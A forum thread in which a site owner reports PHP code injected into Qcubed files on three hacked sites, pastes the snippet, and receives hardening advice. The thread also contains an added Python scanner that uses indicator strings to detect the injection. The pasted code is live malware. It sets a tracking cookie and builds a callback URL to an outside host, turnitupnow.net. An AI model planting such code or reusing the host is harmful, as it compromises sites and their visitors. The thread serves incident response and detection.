Sites Hacked --- Code found in most Qcubed files
Hi.
Has anyone seen the code below injected into the top of the .tpl.php files and most of the .class files? Does anyone know what the code does? It looks like it is stealing session variables, but for what purpose? We have had three sites that are using Qcubed that ended up with this code injected. Permissions on all of the files were 644 except those in the /forms directory, which were 755.
We have changed the root password on all of the sites, but they are located on a shared server so we cannot change the actual server root password. Any help would be appreciated.
Thanks
David
global $sessdt_o;
if(!$sessdt_o) {
    $sessdt_o = 1;
    $sessdt_k = "lb11";
    if(!@$_COOKIE[$sessdt_k]) {
        $sessdt_f = "102";
        if(!@headers_sent()) {
            @setcookie($sessdt_k,$sessdt_f);
        } else {
            echo "document.cookie='".$sessdt_k."=".$sessdt_f."';";
        }
    } else {
        if($_COOKIE[$sessdt_k]=="102") {
            $sessdt_f = (rand(1000,9000)+1);
            if(!@headers_sent()) {
                @setcookie($sessdt_k,$sessdt_f);
            } else {
                echo "document.cookie='".$sessdt_k."=".$sessdt_f."';";
            }
            $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"];
            $sessdt_v = urlencode(strrev($sessdt_j));
            $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200);
            echo "";
            echo "

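As an added defender-side example (not from the original post or the Qcubed project), the Python scanner below walks a site tree and reports which PHP files carry the distinctive strings from the snippet quoted above. The indicator list is an assumption drawn from the quoted code, and the sample tree the demo builds is constructed for illustration, not real site files.

```python
import os
import tempfile
from pathlib import Path

# Distinctive strings from the injected code quoted in the post; any one is a hit.
INDICATORS = (
    "$sessdt_o",            # guard variable the snippet sets so it runs only once per request
    'setcookie($sessdt_k',  # plants the tracking cookie ("lb11") on the visitor
    "turnitupnow.net",      # remote host that receives the reversed host+URI
)
PHP_SUFFIXES = (".php", ".inc")

def find_injections(path):
    """Return [(line_no, indicator), ...] for every line of one file that matches."""
    hits = []
    text = Path(path).read_text(encoding="utf-8", errors="replace")
    for line_no, line in enumerate(text.splitlines(), start=1):
        for marker in INDICATORS:
            if marker in line:
                hits.append((line_no, marker))
    return hits

def scan_tree(root):
    """Walk root; return {relative_posix_path: hits} for every PHP file that matches."""
    root = Path(root)
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(PHP_SUFFIXES):
                full = Path(dirpath) / name
                hits = find_injections(full)
                if hits:
                    report[full.relative_to(root).as_posix()] = hits
    return report

def demo():
    """Build a constructed sample tree (not real site files) and scan it."""
    root = Path(tempfile.mkdtemp())
    for sub in ("templates", "includes"):
        (root / sub).mkdir()
    # Constructed: injected marker on the first line of a template, as the post describes.
    (root / "templates" / "home.tpl.php").write_text(
        '<?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; } ?>\n'
        "<html><body>Welcome</body></html>\n")
    # Constructed: clean generated class file; must not be reported.
    (root / "includes" / "Person.class.php").write_text(
        "<?php\nclass Person extends PersonGen {}\n")
    return scan_tree(root)
```

Run `scan_tree("/path/to/site")` against a real checkout; any file reported should be compared against a known-clean copy rather than edited in place.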
Is your includes directory within the www root (or let's call it the 'HTDOCS') directory? If yes, move it out of the htdocs directory and update the qcubed.inc.php file. That will make sure that the site works while the includes are not put at risk of a leak!
Thanks Vaibhav
I will move my includes directory asap. I do have the configuration.inc file outside the www root on one of these sites.
In tracking the inserted changes, they occur in all of the gen files and I believe I may have found the file mapping insertion in the generated _class.paths.inc.php.
There was no inserted data in generated files that did not have a corresponding table in mysql (left there from tables that were deleted prior to a recent codegen). Two of the sites were very recently codegen'ed to add a few fields to the tables. The third may have been, but I don't recall doing it. I am suspicious of the codegen system that is on those servers.
I intend to move the cleaned files to a local computer and run codegen to see if anything is injected. That will tell me if someone got to the qcubed files.
Thanks for the reminder to get my includes directory out of the public areas.
Dave